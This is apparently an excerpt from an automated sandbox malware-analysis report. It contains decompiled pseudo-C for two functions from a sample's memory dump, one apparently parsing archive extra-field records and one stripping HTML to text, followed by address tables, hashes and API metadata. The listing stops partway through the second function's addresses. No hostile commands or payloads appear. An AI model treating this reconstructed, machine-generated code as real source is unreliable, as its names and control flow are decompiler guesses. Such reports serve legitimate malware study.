                                                    • Instruction Fuzzy Hash: 2341FAB1508345AFC710DF65C884A6FBBE9FF88714F04892EF996C2610E734E649DB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E00CC2210(intOrPtr __ecx, signed int __edx, signed char _a3, signed char _a4, signed int _a5, signed int _a6, signed int _a7, signed char _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20, char _a28, char _a36, char _a48, char _a52, char _a160, char _a172, intOrPtr _a8368, intOrPtr _a8372, intOrPtr _a8376) {
				char _v4;
				signed char _v5;
				char _v12;
				char _v16;
				signed char _t135;
				char _t138;
				signed int _t140;
				unsigned int _t141;
				signed int _t145;
				signed int _t162;
				signed int _t165;
				signed int _t176;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t189;
				signed char _t221;
				signed char _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr _t240;
				signed char _t244;
				intOrPtr _t247;
				signed char _t248;
				signed char _t263;
				signed int _t264;
				signed int _t266;
				intOrPtr _t273;
				intOrPtr _t276;
				intOrPtr _t279;
				intOrPtr _t306;
				intOrPtr _t311;
				signed int _t313;
				intOrPtr _t315;
				signed char _t318;
				char _t319;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				intOrPtr* _t334;
				signed int _t337;
				signed int _t338;
				intOrPtr _t340;
				void* _t341;
				signed int _t345;
				signed int _t348;
				signed int _t361;

				_t313 = __edx;
				E00CDEC50(0x20ac);
				_t315 = _a8368;
				_a12 = __ecx;
				_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _a8372;
				if(_t135 <  *(_t315 + 0x1c)) {
					L96:
					return _t135;
				}
				 *(_t315 + 0x1c) = _t135;
				if(_a8372 >= 2) {
					_t240 = _a8376;
					while(1) {
						_t135 = E00CCCCFB();
						_t244 = _t135;
						_t345 = _t313;
						if(_t345 < 0 || _t345 <= 0 && _t244 == 0) {
							break;
						}
						_t318 =  *(_t315 + 0x1c);
						_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t318;
						if(_t135 == 0) {
							break;
						}
						_t348 = _t313;
						if(_t348 > 0 || _t348 >= 0 && _t244 > _t135) {
							break;
						} else {
							_a8 = _t318 + _t244;
							_t138 = E00CCCCFB();
							_t337 = _t313;
							_t319 = _t138;
							_t313 = _a8;
							_t247 = _t313 -  *(_t315 + 0x1c);
							_a20 = _t247;
							if( *((intOrPtr*)(_t240 + 4)) == 1 && _t319 == 1 && _t337 == 0) {
								 *((char*)(_t240 + 0x1e)) = _t138;
								_t234 = E00CCCCFB();
								_a16 = _t234;
								if((_t234 & 0x00000001) != 0) {
									_t237 = E00CCCCFB();
									if((_t237 | _t313) != 0) {
										_t311 = _a12;
										asm("adc ecx, edx");
										 *((intOrPtr*)(_t240 + 0x20)) = _t237 +  *((intOrPtr*)(_t311 + 0x6cb8));
										 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)(_t311 + 0x6cbc));
									}
									_t234 = _a16;
								}
								if((_t234 & 0x00000002) != 0) {
									_t235 = E00CCCCFB();
									if((_t235 | _t313) != 0) {
										_t306 = _a12;
										asm("adc ecx, edx");
										 *((intOrPtr*)(_t240 + 0x30)) = _t235 +  *((intOrPtr*)(_t306 + 0x6cb8));
										 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)(_t306 + 0x6cbc));
									}
								}
								_t247 = _a20;
								_t313 = _a8;
							}
							if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
								_t361 = _t337;
								if(_t361 > 0 || _t361 >= 0 && _t319 > 7) {
									goto L94;
								} else {
									_t320 = _t319 - 1;
									if(_t320 == 0) {
										_t140 = E00CCCCFB();
										__eflags = _t140;
										if(_t140 == 0) {
											_t141 = E00CCCCFB();
											 *(_t240 + 0x10c1) = _t141 & 0x00000001;
											 *(_t240 + 0x10ca) = _t141 >> 0x00000001 & 0x00000001;
											_t145 = E00CCCBAF(_t315) & 0x000000ff;
											 *(_t240 + 0x10ec) = _t145;
											__eflags = _t145 - 0x18;
											if(_t145 > 0x18) {
												E00CC4092( &_a28, 0x14, L"xc%u", _t145);
												_t341 = _t341 + 0x10;
												E00CC403D(_a12, _t240 + 0x28,  &_a28);
											}
											E00CCCC5D(_t315, _t240 + 0x10a1, 0x10);
											E00CCCC5D(_t315, _t240 + 0x10b1, 0x10);
											__eflags =  *(_t240 + 0x10c1);
											if( *(_t240 + 0x10c1) != 0) {
												_t321 = _t240 + 0x10c2;
												E00CCCC5D(_t315, _t321, 8);
												E00CCCC5D(_t315,  &_a16, 4);
												E00CD0016( &_a52);
												_push(8);
												_push(_t321);
												_push( &_a48);
												E00CD005C();
												_push( &_v4);
												E00CCFF33( &_a36);
												_t162 = E00CE0C4A( &_v16,  &_v12, 4);
												_t341 = _t341 + 0xc;
												asm("sbb al, al");
												__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
												 *(_t240 + 0x10c1) =  ~_t162 + 1;
												if( *((intOrPtr*)(_t240 + 4)) == 3) {
													_t165 = E00CE0C4A(_t321, 0xcf36a8, 8);
													_t341 = _t341 + 0xc;
													__eflags = _t165;
													if(_t165 == 0) {
														 *(_t240 + 0x10c1) = _t165;
													}
												}
											}
											 *((char*)(_t240 + 0x10a0)) = 1;
											 *((intOrPtr*)(_t240 + 0x109c)) = 5;
											 *((char*)(_t240 + 0x109b)) = 1;
										} else {
											E00CC4092( &_a28, 0x14, L"x%u", _t140);
											_t341 = _t341 + 0x10;
											E00CC403D(_a12, _t240 + 0x28,  &_a28);
										}
										goto L94;
									}
									_t322 = _t320 - 1;
									if(_t322 == 0) {
										_t176 = E00CCCCFB();
										__eflags = _t176;
										if(_t176 != 0) {
											goto L94;
										}
										_push(0x20);
										 *((intOrPtr*)(_t240 + 0x1070)) = 3;
										_push(_t240 + 0x1074);
										L37:
										E00CCCC5D(_t315);
										goto L94;
									}
									_t323 = _t322 - 1;
									if(_t323 == 0) {
										__eflags = _t247 - 5;
										if(_t247 < 5) {
											goto L94;
										}
										_t179 = E00CCCCFB();
										_a3 = _t179;
										_t180 = _t179 & 0x00000001;
										_t263 = _a3;
										_a4 = _t180;
										_t313 = _t263 & 0x00000002;
										__eflags = _t313;
										_a5 = _t313;
										if(_t313 != 0) {
											_t279 = _t315;
											__eflags = _t180;
											if(__eflags == 0) {
												E00CD15BB(_t240 + 0x1040, E00CCCC3D(_t279, __eflags), _t313);
											} else {
												E00CD158F(_t240 + 0x1040, E00CCCBFB(_t279), 0);
											}
											_t263 = _a3;
											_t180 = _a4;
										}
										_t264 = _t263 & 0x00000004;
										__eflags = _t264;
										_a6 = _t264;
										if(_t264 != 0) {
											_t326 = _t240 + 0x1048;
											_t276 = _t315;
											__eflags = _t180;
											if(__eflags == 0) {
												E00CD15BB(_t326, E00CCCC3D(_t276, __eflags), _t313);
											} else {
												E00CD158F(_t326, E00CCCBFB(_t276), 0);
											}
										}
										_t181 = _a3;
										_t266 = _t181 & 0x00000008;
										__eflags = _t266;
										_a7 = _t266;
										if(_t266 == 0) {
											__eflags = _a4;
											if(_a4 == 0) {
												goto L94;
											}
											goto L72;
										} else {
											__eflags = _a4;
											_t325 = _t240 + 0x1050;
											_t273 = _t315;
											if(__eflags == 0) {
												E00CD15BB(_t325, E00CCCC3D(_t273, __eflags), _t313);
												goto L94;
											}
											E00CD158F(_t325, E00CCCBFB(_t273), 0);
											_t181 = _v5;
											L72:
											__eflags = _t181 & 0x00000010;
											if((_t181 & 0x00000010) != 0) {
												__eflags = _a5;
												if(_a5 == 0) {
													_t338 = 0x3fffffff;
													_t324 = 0x3b9aca00;
												} else {
													_t188 = E00CCCBFB(_t315);
													_t338 = 0x3fffffff;
													_t324 = 0x3b9aca00;
													_t189 = _t188 & 0x3fffffff;
													__eflags = _t189 - 0x3b9aca00;
													if(_t189 < 0x3b9aca00) {
														E00CD1208(_t240 + 0x1040, _t189, 0);
													}
												}
												__eflags = _a6;
												if(_a6 != 0) {
													_t186 = E00CCCBFB(_t315) & _t338;
													__eflags = _t186 - _t324;
													if(_t186 < _t324) {
														E00CD1208(_t240 + 0x1048, _t186, 0);
													}
												}
												__eflags = _a7;
												if(_a7 != 0) {
													_t183 = E00CCCBFB(_t315) & _t338;
													__eflags = _t183 - _t324;
													if(_t183 < _t324) {
														E00CD1208(_t240 + 0x1050, _t183, 0);
													}
												}
											}
											goto L94;
										}
									}
									_t327 = _t323 - 1;
									if(_t327 == 0) {
										__eflags = _t247 - 1;
										if(_t247 >= 1) {
											E00CCCCFB();
											__eflags = E00CCCCFB();
											if(__eflags != 0) {
												 *((char*)(_t240 + 0x10f3)) = 1;
												E00CC4092( &_a28, 0x14, L";%u", _t204);
												_t341 = _t341 + 0x10;
												E00CD05DA(__eflags, _t240 + 0x28,  &_a28, 0x800);
											}
										}
										goto L94;
									}
									_t328 = _t327 - 1;
									if(_t328 == 0) {
										 *((intOrPtr*)(_t240 + 0x1100)) = E00CCCCFB();
										 *(_t240 + 0x2104) = E00CCCCFB() & 0x00000001;
										_t329 = E00CCCCFB();
										_a172 = 0;
										__eflags = _t329 - 0x1fff;
										if(_t329 < 0x1fff) {
											E00CCCC5D(_t315,  &_a172, _t329);
											 *((char*)(_t341 + _t329 + 0xbc)) = 0;
										}
										E00CCC335( &_a172,  &_a172, 0x2000);
										_push(0x800);
										_push(_t240 + 0x1104);
										_push( &_a160);
										E00CD1C3B();
										goto L94;
									}
									_t330 = _t328 - 1;
									if(_t330 == 0) {
										_t221 = E00CCCCFB();
										_a16 = _t221;
										_t339 = _t240 + 0x2108;
										 *(_t240 + 0x2106) = _t221 >> 0x00000002 & 0x00000001;
										 *(_t240 + 0x2107) = _t221 >> 0x00000003 & 0x00000001;
										 *((char*)(_t240 + 0x2208)) = 0;
										 *((char*)(_t240 + 0x2108)) = 0;
										__eflags = _t221 & 0x00000001;
										if((_t221 & 0x00000001) != 0) {
											_t332 = E00CCCCFB();
											__eflags = _t332 - 0xff;
											if(_t332 >= 0xff) {
												_t332 = 0xff;
											}
											E00CCCC5D(_t315, _t339, _t332);
											_t221 = _a8;
											 *((char*)(_t332 + _t240 + 0x2108)) = 0;
										}
										__eflags = _t221 & 0x00000002;
										if((_t221 & 0x00000002) != 0) {
											_t331 = E00CCCCFB();
											__eflags = _t331 - 0xff;
											if(_t331 >= 0xff) {
												_t331 = 0xff;
											}
											E00CCCC5D(_t315, _t240 + 0x2208, _t331);
											 *((char*)(_t331 + _t240 + 0x2208)) = 0;
										}
										__eflags =  *(_t240 + 0x2106);
										if( *(_t240 + 0x2106) != 0) {
											 *((intOrPtr*)(_t240 + 0x2308)) = E00CCCCFB();
										}
										__eflags =  *(_t240 + 0x2107);
										if( *(_t240 + 0x2107) != 0) {
											 *((intOrPtr*)(_t240 + 0x230c)) = E00CCCCFB();
										}
										 *((char*)(_t240 + 0x2105)) = 1;
										goto L94;
									}
									if(_t330 != 1) {
										goto L94;
									}
									_t340 = _t247;
									if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t315 + 0x18)) - _t313 == 1) {
										_t340 = _t247 + 1;
									}
									_t334 = _t240 + 0x1028;
									E00CC20BD(_t334, _t340);
									_push(_t340);
									_push( *_t334);
									goto L37;
								}
							} else {
								L94:
								_t248 = _a8;
								 *(_t315 + 0x1c) = _t248;
								_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t248;
								if(_t135 >= 2) {
									continue;
								}
								break;
							}
						}
					}
				}
			}































































                                                    0x00cc2210
                                                    0x00cc2215
                                                    0x00cc221b
                                                    0x00cc2222
                                                    0x00cc2229
                                                    0x00cc2233
                                                    0x00cc2862
                                                    0x00cc2868
                                                    0x00cc2868
                                                    0x00cc2241
                                                    0x00cc2244
                                                    0x00cc224b
                                                    0x00cc2254
                                                    0x00cc2256
                                                    0x00cc225b
                                                    0x00cc225d
                                                    0x00cc225f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2272
                                                    0x00cc2275
                                                    0x00cc2277
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc227d
                                                    0x00cc227f
                                                    0x00000000
                                                    0x00cc228f
                                                    0x00cc2294
                                                    0x00cc2298
                                                    0x00cc229d
                                                    0x00cc229f
                                                    0x00cc22a1
                                                    0x00cc22a7
                                                    0x00cc22ae
                                                    0x00cc22b2
                                                    0x00cc22bf
                                                    0x00cc22c2
                                                    0x00cc22c7
                                                    0x00cc22cd
                                                    0x00cc22d1
                                                    0x00cc22da
                                                    0x00cc22dc
                                                    0x00cc22ec
                                                    0x00cc22ee
                                                    0x00cc22f1
                                                    0x00cc22f1
                                                    0x00cc22f4
                                                    0x00cc22f4
                                                    0x00cc22fa
                                                    0x00cc22fe
                                                    0x00cc2307
                                                    0x00cc2309
                                                    0x00cc2319
                                                    0x00cc231b
                                                    0x00cc231e
                                                    0x00cc231e
                                                    0x00cc2307
                                                    0x00cc2321
                                                    0x00cc2325
                                                    0x00cc2325
                                                    0x00cc232d
                                                    0x00cc2339
                                                    0x00cc233b
                                                    0x00000000
                                                    0x00cc234c
                                                    0x00cc234c
                                                    0x00cc234f
                                                    0x00cc26f3
                                                    0x00cc26f8
                                                    0x00cc26fa
                                                    0x00cc272a
                                                    0x00cc2738
                                                    0x00cc2740
                                                    0x00cc274b
                                                    0x00cc274e
                                                    0x00cc2754
                                                    0x00cc2757
                                                    0x00cc2766
                                                    0x00cc2773
                                                    0x00cc277b
                                                    0x00cc277b
                                                    0x00cc278b
                                                    0x00cc279b
                                                    0x00cc27a0
                                                    0x00cc27a7
                                                    0x00cc27af
                                                    0x00cc27b8
                                                    0x00cc27c6
                                                    0x00cc27d0
                                                    0x00cc27d5
                                                    0x00cc27d7
                                                    0x00cc27dc
                                                    0x00cc27dd
                                                    0x00cc27e6
                                                    0x00cc27ec
                                                    0x00cc27fd
                                                    0x00cc2802
                                                    0x00cc2807
                                                    0x00cc280b
                                                    0x00cc280f
                                                    0x00cc2815
                                                    0x00cc281f
                                                    0x00cc2824
                                                    0x00cc2827
                                                    0x00cc2829
                                                    0x00cc282b
                                                    0x00cc282b
                                                    0x00cc2829
                                                    0x00cc2815
                                                    0x00cc2831
                                                    0x00cc2838
                                                    0x00cc2842
                                                    0x00cc26fc
                                                    0x00cc2709
                                                    0x00cc2716
                                                    0x00cc271e
                                                    0x00cc271e
                                                    0x00000000
                                                    0x00cc26fa
                                                    0x00cc2355
                                                    0x00cc2358
                                                    0x00cc26cc
                                                    0x00cc26d1
                                                    0x00cc26d3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc26d9
                                                    0x00cc26e1
                                                    0x00cc26eb
                                                    0x00cc23ad
                                                    0x00cc23af
                                                    0x00000000
                                                    0x00cc23af
                                                    0x00cc235e
                                                    0x00cc2361
                                                    0x00cc2556
                                                    0x00cc2559
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2561
                                                    0x00cc2566
                                                    0x00cc256a
                                                    0x00cc256c
                                                    0x00cc2572
                                                    0x00cc2576
                                                    0x00cc2576
                                                    0x00cc2579
                                                    0x00cc257d
                                                    0x00cc257f
                                                    0x00cc2581
                                                    0x00cc2583
                                                    0x00cc25a7
                                                    0x00cc2585
                                                    0x00cc2593
                                                    0x00cc2593
                                                    0x00cc25ac
                                                    0x00cc25b0
                                                    0x00cc25b0
                                                    0x00cc25b4
                                                    0x00cc25b4
                                                    0x00cc25b7
                                                    0x00cc25bb
                                                    0x00cc25bd
                                                    0x00cc25c3
                                                    0x00cc25c5
                                                    0x00cc25c7
                                                    0x00cc25e3
                                                    0x00cc25c9
                                                    0x00cc25d3
                                                    0x00cc25d3
                                                    0x00cc25c7
                                                    0x00cc25e8
                                                    0x00cc25ee
                                                    0x00cc25ee
                                                    0x00cc25f1
                                                    0x00cc25f5
                                                    0x00cc262e
                                                    0x00cc2633
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc25f7
                                                    0x00cc25f7
                                                    0x00cc25fc
                                                    0x00cc2602
                                                    0x00cc2604
                                                    0x00cc2624
                                                    0x00000000
                                                    0x00cc2624
                                                    0x00cc2610
                                                    0x00cc2615
                                                    0x00cc2639
                                                    0x00cc2639
                                                    0x00cc263b
                                                    0x00cc2641
                                                    0x00cc2646
                                                    0x00cc266f
                                                    0x00cc2674
                                                    0x00cc2648
                                                    0x00cc264a
                                                    0x00cc264f
                                                    0x00cc2654
                                                    0x00cc2659
                                                    0x00cc265b
                                                    0x00cc265d
                                                    0x00cc2668
                                                    0x00cc2668
                                                    0x00cc265d
                                                    0x00cc2679
                                                    0x00cc267e
                                                    0x00cc2687
                                                    0x00cc2689
                                                    0x00cc268b
                                                    0x00cc2696
                                                    0x00cc2696
                                                    0x00cc268b
                                                    0x00cc269b
                                                    0x00cc26a0
                                                    0x00cc26ad
                                                    0x00cc26af
                                                    0x00cc26b1
                                                    0x00cc26c0
                                                    0x00cc26c0
                                                    0x00cc26b1
                                                    0x00cc26a0
                                                    0x00000000
                                                    0x00cc263b
                                                    0x00cc25f5
                                                    0x00cc2367
                                                    0x00cc236a
                                                    0x00cc2503
                                                    0x00cc2506
                                                    0x00cc250e
                                                    0x00cc251a
                                                    0x00cc251c
                                                    0x00cc252c
                                                    0x00cc2536
                                                    0x00cc253b
                                                    0x00cc254c
                                                    0x00cc254c
                                                    0x00cc251c
                                                    0x00000000
                                                    0x00cc2506
                                                    0x00cc2370
                                                    0x00cc2373
                                                    0x00cc248e
                                                    0x00cc249d
                                                    0x00cc24a8
                                                    0x00cc24aa
                                                    0x00cc24b2
                                                    0x00cc24b8
                                                    0x00cc24c5
                                                    0x00cc24ca
                                                    0x00cc24ca
                                                    0x00cc24e0
                                                    0x00cc24e5
                                                    0x00cc24f0
                                                    0x00cc24f8
                                                    0x00cc24f9
                                                    0x00000000
                                                    0x00cc24f9
                                                    0x00cc2379
                                                    0x00cc237c
                                                    0x00cc23bb
                                                    0x00cc23c2
                                                    0x00cc23c9
                                                    0x00cc23d2
                                                    0x00cc23e0
                                                    0x00cc23e6
                                                    0x00cc23ed
                                                    0x00cc23f1
                                                    0x00cc23f3
                                                    0x00cc23fc
                                                    0x00cc2403
                                                    0x00cc2405
                                                    0x00cc2407
                                                    0x00cc2407
                                                    0x00cc240d
                                                    0x00cc2412
                                                    0x00cc2416
                                                    0x00cc2416
                                                    0x00cc241e
                                                    0x00cc2420
                                                    0x00cc2429
                                                    0x00cc2430
                                                    0x00cc2432
                                                    0x00cc2434
                                                    0x00cc2434
                                                    0x00cc2440
                                                    0x00cc2445
                                                    0x00cc2445
                                                    0x00cc244d
                                                    0x00cc2454
                                                    0x00cc245d
                                                    0x00cc245d
                                                    0x00cc2463
                                                    0x00cc246a
                                                    0x00cc2473
                                                    0x00cc2473
                                                    0x00cc2479
                                                    0x00000000
                                                    0x00cc2479
                                                    0x00cc2381
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc238b
                                                    0x00cc238d
                                                    0x00cc2399
                                                    0x00cc2399
                                                    0x00cc239c
                                                    0x00cc23a5
                                                    0x00cc23aa
                                                    0x00cc23ab
                                                    0x00000000
                                                    0x00cc23ab
                                                    0x00cc2849
                                                    0x00cc2849
                                                    0x00cc2849
                                                    0x00cc284d
                                                    0x00cc2853
                                                    0x00cc2858
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2858
                                                    0x00cc232d
                                                    0x00cc227f
                                                    0x00cc2860

                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CC2536
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                      • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                    • String ID: ;%u$x%u$xc%u
                                                    • API String ID: 3053425827-2277559157
                                                    • Opcode ID: 88cb60be4391e8d7d7e068f1712914438104a59be05b1e7f89db1b4396a3572e
                                                    • Instruction ID: bd91396eb8300915779c9058e1ec88604a07e9299aa538cc05306b0cc441069c
                                                    • Opcode Fuzzy Hash: 88cb60be4391e8d7d7e068f1712914438104a59be05b1e7f89db1b4396a3572e
                                                    • Instruction Fuzzy Hash: 6EF116716083809BDB25EF28C4E5FFE77996F90300F08056DFD8A9B283CB649A45D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E00CD9CFE(void* __eflags, signed short* _a4) {
				signed int* _v4;
				intOrPtr _v8;
				void* __ecx;
				signed int* _t17;
				signed int _t18;
				void* _t21;
				void* _t22;
				void* _t24;
				signed short _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed short* _t29;
				void* _t30;
				signed int _t31;
				signed int _t32;
				void* _t33;
				signed int _t36;
				void* _t38;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed short _t45;
				signed int _t47;
				short _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed short* _t53;
				signed int* _t55;
				short* _t56;
				short* _t57;
				signed short* _t58;
				signed int* _t59;
				intOrPtr _t60;
				signed int* _t77;

				_t58 = _a4;
				_push(2 + E00CE3E13(_t58) * 2);
				_t17 = E00CE3E33(_t38);
				_t59 = _t17;
				_v4 = _t59;
				if(_t59 == 0) {
					return _t17;
				}
				_t18 = E00CD95AA(_t58);
				_t42 =  *_t58 & 0x0000ffff;
				_t36 = _t18;
				_t55 = _t59;
				if(_t42 == 0) {
					L47:
					return _t59;
				} else {
					_push(0xd);
					_push(0x20);
					_v8 = 0x3e;
					do {
						_t43 = _t42 & 0x0000ffff;
						while(_t43 != 0x3c) {
							if(_t36 == 0) {
								L11:
								_t36 = 0;
								__eflags = 0;
								if(0 == 0) {
									L20:
									_t27 =  *_t58 & 0x0000ffff;
									__eflags = _t27;
									if(__eflags == 0) {
										L27:
										_t28 =  *_t58 & 0x0000ffff;
										_t52 = 0x20;
										_t43 = _t28;
										_t72 = _t28;
										_t26 = 0xd;
										if(_t28 != 0) {
											continue;
										}
										break;
									}
									__eflags = _t27 - _t52;
									if(__eflags != 0) {
										L24:
										 *_t55 = _t27;
										L25:
										_t55 =  &(_t55[0]);
										L26:
										_t58 =  &(_t58[1]);
										goto L27;
									}
									__eflags = _t55 - _t59;
									if(__eflags == 0) {
										goto L24;
									}
									__eflags =  *((intOrPtr*)(_t55 - 2)) - _t52;
									if(__eflags == 0) {
										goto L26;
									}
									goto L24;
								}
								__eflags = _t43 - 0x26;
								if(_t43 != 0x26) {
									goto L20;
								}
								_t29 = 0;
								__eflags = 0;
								do {
									_t53 = _t29 + _t58;
									_t47 =  *_t53 & 0x0000ffff;
									__eflags = _t47;
									if(_t47 == 0) {
										break;
									}
									__eflags = _t47 - 0x3b;
									if(_t47 == 0x3b) {
										_t8 =  &(_t53[1]); // 0x22
										_t58 = _t8;
										_t36 = 1;
									}
									_t29 = _t29 + 2;
									__eflags = _t29 - 0x28;
								} while (_t29 < 0x28);
								__eflags = _t36;
								if(__eflags != 0) {
									goto L27;
								}
								_t52 = 0x20;
								goto L20;
							}
							if(_t43 == _t26) {
								L8:
								if(_t55 == _t59 ||  *((intOrPtr*)(_t55 - 2)) != _t52) {
									 *_t55 = _t52;
									goto L25;
								} else {
									goto L26;
								}
							}
							_t30 = 0xa;
							if(_t43 != _t30) {
								goto L11;
							}
							goto L8;
						}
						_t21 = E00CD1FDD(_t72, _t58, L"</p>", 4);
						_t36 = _t36 & 0xffffff00 | _t21 == 0x00000000;
						_t74 = _t21;
						if(_t21 == 0 || E00CD1FDD(_t74, _t58, L"<br>", 4) == 0) {
							_t44 = 0xd;
							_t22 = 2;
							 *_t55 = _t44;
							_t56 = _t55 + _t22;
							_t49 = 0xa;
							 *_t56 = _t49;
							_t55 = _t56 + _t22;
							if(_t36 != 0) {
								 *_t55 = _t44;
								_t57 = _t55 + _t22;
								 *_t57 = _t49;
								_t55 = _t57 + _t22;
								_t77 = _t55;
							}
						}
						 *_t55 = 0;
						_t24 = E00CD1FDD(_t77, _t58, L"<style>", 7);
						_t45 =  *_t58 & 0x0000ffff;
						_t50 = _t45;
						if(_t24 != 0) {
							_t51 = _t45;
							__eflags = _t45;
							if(_t45 == 0) {
								L44:
								_t25 = _t51 & 0x0000ffff;
								__eflags = _t51 - _v8;
								if(__eflags == 0) {
									_t58 =  &(_t58[1]);
									__eflags = _t58;
									_t25 =  *_t58 & 0x0000ffff;
								}
								goto L46;
							}
							_t60 = _v8;
							while(1) {
								_t51 = _t45 & 0x0000ffff;
								__eflags = _t45 - _t60;
								if(_t45 == _t60) {
									break;
								}
								_t58 =  &(_t58[1]);
								_t31 =  *_t58 & 0x0000ffff;
								_t45 = _t31;
								_t51 = _t31;
								__eflags = _t31;
								if(_t31 != 0) {
									continue;
								}
								break;
							}
							_t59 = _v4;
							goto L44;
						} else {
							_t32 = _t50;
							_t79 = _t45;
							if(_t45 == 0) {
								L38:
								_t25 = _t32 & 0x0000ffff;
								goto L46;
							} else {
								goto L34;
							}
							while(1) {
								L34:
								_t33 = E00CD1FDD(_t79, _t58, L"</style>", 8);
								_t58 =  &(_t58[1]);
								if(_t33 == 0) {
									break;
								}
								_t32 =  *_t58 & 0x0000ffff;
								if(_t32 != 0) {
									continue;
								}
								goto L38;
							}
							_t58 =  &(_t58[7]);
							__eflags = _t58;
							_t32 =  *_t58 & 0x0000ffff;
							goto L38;
						}
						L46:
						_t52 = 0x20;
						_t42 = _t25 & 0x0000ffff;
						_t26 = 0xd;
					} while (_t25 != 0);
					goto L47;
				}
			}







































                                                    0x00cd9d02
                                                    0x00cd9d16
                                                    0x00cd9d17
                                                    0x00cd9d1c
                                                    0x00cd9d1e
                                                    0x00cd9d26
                                                    0x00cd9ecb
                                                    0x00cd9ecb
                                                    0x00cd9d30
                                                    0x00cd9d35
                                                    0x00cd9d38
                                                    0x00cd9d3a
                                                    0x00cd9d3f
                                                    0x00cd9ec3
                                                    0x00000000
                                                    0x00cd9d45
                                                    0x00cd9d45
                                                    0x00cd9d48
                                                    0x00cd9d4b
                                                    0x00cd9d53
                                                    0x00cd9d53
                                                    0x00cd9d56
                                                    0x00cd9d62
                                                    0x00cd9d80
                                                    0x00cd9d80
                                                    0x00cd9d82
                                                    0x00cd9d84
                                                    0x00cd9db2
                                                    0x00cd9db2
                                                    0x00cd9db5
                                                    0x00cd9db8
                                                    0x00cd9dd2
                                                    0x00cd9dd2
                                                    0x00cd9dd7
                                                    0x00cd9dda
                                                    0x00cd9ddc
                                                    0x00cd9ddf
                                                    0x00cd9de0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9de0
                                                    0x00cd9dba
                                                    0x00cd9dbd
                                                    0x00cd9dc9
                                                    0x00cd9dc9
                                                    0x00cd9dcc
                                                    0x00cd9dcc
                                                    0x00cd9dcf
                                                    0x00cd9dcf
                                                    0x00000000
                                                    0x00cd9dcf
                                                    0x00cd9dbf
                                                    0x00cd9dc1
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9dc3
                                                    0x00cd9dc7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9dc7
                                                    0x00cd9d86
                                                    0x00cd9d8a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9d8c
                                                    0x00cd9d8c
                                                    0x00cd9d8e
                                                    0x00cd9d8e
                                                    0x00cd9d91
                                                    0x00cd9d94
                                                    0x00cd9d97
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9d99
                                                    0x00cd9d9c
                                                    0x00cd9d9e
                                                    0x00cd9d9e
                                                    0x00cd9da1
                                                    0x00cd9da1
                                                    0x00cd9da3
                                                    0x00cd9da6
                                                    0x00cd9da6
                                                    0x00cd9dab
                                                    0x00cd9dad
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9db1
                                                    0x00000000
                                                    0x00cd9db1
                                                    0x00cd9d67
                                                    0x00cd9d71
                                                    0x00cd9d73
                                                    0x00cd9d7b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9d73
                                                    0x00cd9d6b
                                                    0x00cd9d6f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9d6f
                                                    0x00cd9dee
                                                    0x00cd9df5
